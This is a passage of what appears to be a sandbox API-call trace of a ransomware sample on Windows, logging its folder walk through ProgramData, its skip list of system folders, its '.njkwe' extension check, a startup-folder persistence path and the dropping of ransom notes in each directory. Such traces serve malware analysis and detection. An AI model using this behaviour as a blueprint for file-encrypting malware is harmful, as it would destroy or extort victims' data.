ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..?", cAlternateFileName="揸Â￿￿扨@￿￿揸Â\x05")) returned 0xffffffff [0067.385] GetProcessHeap () returned 0xbe0000 [0067.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.385] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8000000, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0067.385] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0067.385] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0067.385] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0067.385] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0067.385] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0067.385] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0067.385] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0067.385] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0067.385] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.385] GetProcessHeap () returned 0xbe0000 [0067.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.413] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned 30 [0067.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fa0 [0067.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.413] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.413] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.413] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.413] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.413] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\.") returned 30 [0067.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.413] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0067.413] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.413] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0067.413] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.414] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\." (normalized: "c:\\programdata\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.414] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.414] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.414] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.414] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.414] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.414] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.414] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\..") returned 31 [0067.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.414] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0067.414] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.414] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0067.414] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.414] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\.." (normalized: "c:\\programdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.414] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d3d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6d9d2c8, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AppV", cAlternateFileName="")) returned 1 [0067.414] lstrcmpiW (lpString1="AppV", lpString2="Windows") returned -1 [0067.414] lstrcmpiW (lpString1="AppV", lpString2="$Recycle.bin") returned 1 [0067.414] lstrcmpiW (lpString1="AppV", lpString2="System Volume Information") returned -1 [0067.414] lstrcmpiW (lpString1="AppV", lpString2="Program Files") returned -1 [0067.414] lstrcmpiW (lpString1="AppV", lpString2="Program Files (x86)") returned -1 [0067.416] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV") returned 33 [0067.416] lstrcmpW (lpString1="AppV", lpString2=".") returned 1 [0067.416] lstrcmpW (lpString1="AppV", lpString2="..") returned 1 [0067.416] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\AppV", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.416] GetProcessHeap () returned 0xbe0000 [0067.416] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0067.416] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\*") returned 35 [0067.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d3d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6d9d2c8, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0067.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.417] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.417] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.417] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.417] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.417] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\.") returned 35 [0067.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.417] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d3d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6d9d2c8, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.417] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.417] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.417] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.417] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.417] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.417] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\..") returned 36 [0067.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.417] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d9bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe825779a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup", cAlternateFileName="")) returned 1 [0067.417] lstrcmpiW (lpString1="Setup", lpString2="Windows") returned -1 [0067.417] lstrcmpiW (lpString1="Setup", lpString2="$Recycle.bin") returned 1 [0067.417] lstrcmpiW (lpString1="Setup", lpString2="System Volume Information") returned -1 [0067.417] lstrcmpiW (lpString1="Setup", lpString2="Program Files") returned 1 [0067.417] lstrcmpiW (lpString1="Setup", lpString2="Program Files (x86)") returned 1 [0067.417] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup") returned 39 [0067.417] lstrcmpW (lpString1="Setup", lpString2=".") returned 1 [0067.417] lstrcmpW (lpString1="Setup", lpString2="..") returned 1 [0067.417] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.417] GetProcessHeap () returned 0xbe0000 [0067.417] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.417] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\*") returned 41 [0067.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d9bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe825779a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0067.418] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.418] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.418] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.418] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.418] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.418] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\.") returned 41 [0067.418] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.418] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0067.418] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.418] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0067.418] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\." (normalized: "c:\\programdata\\microsoft\\appv\\setup\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.419] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d9bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe825779a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.419] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.419] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.419] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.419] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.419] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.419] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\..") returned 42 [0067.419] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.419] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.419] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0067.419] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0067.419] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0067.419] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\.." (normalized: "c:\\programdata\\microsoft\\appv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.419] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799dd27b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe2889e45, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe2889e45, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="OfficeIntegrator.ps1", cAlternateFileName="")) returned 1 [0067.419] lstrcmpiW (lpString1="OfficeIntegrator.ps1", lpString2="Windows") returned -1 [0067.419] lstrcmpiW (lpString1="OfficeIntegrator.ps1", lpString2="$Recycle.bin") returned 1 [0067.419] lstrcmpiW (lpString1="OfficeIntegrator.ps1", lpString2="System Volume Information") returned -1 [0067.419] lstrcmpiW (lpString1="OfficeIntegrator.ps1", lpString2="Program Files") returned -1 [0067.419] lstrcmpiW (lpString1="OfficeIntegrator.ps1", lpString2="Program Files (x86)") returned -1 [0067.419] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\OfficeIntegrator.ps1") returned 60 [0067.419] StrStrIW (lpFirst="OfficeIntegrator.ps1", lpSrch=".njkwe") returned 0x0 [0067.419] lstrcmpW (lpString1="OfficeIntegrator.ps1", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.419] lstrcmpW (lpString1="OfficeIntegrator.ps1", lpString2="taridd") returned -1 [0067.419] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\OfficeIntegrator.ps1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\OfficeIntegrator.ps1" (normalized: "c:\\programdata\\microsoft\\appv\\setup\\officeintegrator.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.420] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799dd27b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe2889e45, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe2889e45, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="OfficeIntegrator.ps1", cAlternateFileName="")) returned 0 [0067.420] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0067.421] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0067.421] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\Setup\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\appv\\setup\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.421] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.423] CloseHandle (hObject=0x430) returned 1 [0067.423] GetProcessHeap () returned 0xbe0000 [0067.423] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.423] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbcb1d9bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe825779a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup", cAlternateFileName="")) returned 0 [0067.423] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0067.423] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 65 [0067.423] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\AppV\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\appv\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0067.424] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0067.424] CloseHandle (hObject=0x42c) returned 1 [0067.425] GetProcessHeap () returned 0xbe0000 [0067.425] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0067.425] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c2b2f4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xfa011b19, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xfa011b19, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0067.425] lstrcmpiW (lpString1="ClickToRun", lpString2="Windows") returned -1 [0067.425] lstrcmpiW (lpString1="ClickToRun", lpString2="$Recycle.bin") returned 1 [0067.425] lstrcmpiW (lpString1="ClickToRun", lpString2="System Volume Information") returned -1 [0067.425] lstrcmpiW (lpString1="ClickToRun", lpString2="Program Files") returned -1 [0067.425] lstrcmpiW (lpString1="ClickToRun", lpString2="Program Files (x86)") returned -1 [0067.425] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned 39 [0067.425] lstrcmpW (lpString1="ClickToRun", lpString2=".") returned 1 [0067.425] lstrcmpW (lpString1="ClickToRun", lpString2="..") returned 1 [0067.425] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.425] GetProcessHeap () returned 0xbe0000 [0067.425] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0067.425] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*") returned 41 [0067.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c2b2f4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c4413a9, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c4413a9, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0067.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.426] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.426] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.426] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.426] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.426] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\.") returned 41 [0067.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.426] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c2b2f4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c4413a9, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c4413a9, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.426] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.426] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.426] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.426] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.426] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.426] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\..") returned 42 [0067.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.426] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.427] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a7c64d, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a7c64d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", cAlternateFileName="0D0D4E~1")) returned 1 [0067.427] lstrcmpiW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="Windows") returned -1 [0067.427] lstrcmpiW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="$Recycle.bin") returned 1 [0067.427] lstrcmpiW (lpString1="0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4", lpString2="System Volume Information") returned -1 [0067.427] 